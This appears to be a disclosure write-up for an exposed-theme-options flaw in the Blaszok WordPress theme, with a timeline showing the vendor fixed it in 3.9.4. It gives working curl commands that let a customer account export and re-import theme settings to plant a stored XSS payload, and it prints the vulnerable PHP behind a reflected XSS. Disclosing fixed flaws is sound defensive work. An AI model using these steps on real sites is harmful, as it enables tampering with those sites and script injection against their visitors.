Blaszok eCommerce WordPress theme suffers from a critical security issue: exposed theme options.
This type of vulnerability means that an attacker can set, update and/or read the options stored for a theme or a plugin.
A lot of premium themes and plug-in developers try to implement their own system in which they store settings and options related to the product. There are quite a few ready-made solutions that can not only can cut back development time, but chances are that they are much more secure as well. One prime example would be the Redux framework.
I looked at the Blaszok eCommerce theme because it is listed under the eCommerce tag on ThemeForest.
I usually look at the low hanging fruits first
unserialize, etc and this showed up (
add_action('wp_ajax_mpcth_export_settings', 'mpcth_export_settings'); [...] add_action('wp_ajax_mpcth_import_settings', 'mpcth_import_settings');
You can look a the full source code : options-framework.sphp
mpcth_import_settings do not check for capability or a nonce. This, under normal circumstances, would be an Authenticated stored XSS or exposed theme options, but because this theme is an eCommerce theme, chances are huge that WooCommerce is installed.
And if a theme has WooCommerce, chances are big that users can register under the
customer role, and after they log in as a customer can call the
mpcth_export_settings and the
Export the current settings
$ curl 'http://127.0.0.1/wp-admin/admin-ajax.php' -H 'Cookie: [CUSTOMER_AUTH_COOKIES] --data 'action=mpcth_export_settings' > settings.json
Edit the theme settings as needed :)
$ cat settings.json | python -m json.tool > settings_nice.json $ vi settings_nice.json
I picked the first one
mpcth_analytics_code seemed pretty straightforward.
"mpcth_analytics_code": " alert('Greetings from WpHutte'); ", [...] "mpcth_enable_analytics": "1",
Next step is to import it
$ curl 'http://127.0.0.1/wp-admin/admin-ajax.php' -H 'Cookie: [CUSTOMER_AUTH_COOKIES]' -F 'action=mpcth_import_settings' -F '[email protected]_nice.json' <h3>Importing...</h3><h4>All settings were imported.</h4><script>location.href = ""</script>
As a bonus, there is a reflected XSS as well:
echo '<h4>' . __('All settings were imported.', 'mpcth') . '</h4>'; echo '<script>location.href = "' . $_REQUEST['panel_url'] . '"</script>';
The ability to edit the theme options is pretty scary, but the theme has only ~6000 sales.
14 - 07 - 2017 - Vulnerability discovered 15 - 07 - 2017 - Vendor notified 26 - 07 - 2017 - Vendor fixed the issues in 3.9.4 (FIXED: Theme Options security vulnerability issue) 14 - 08 - 2017 - Vulnerability goes public.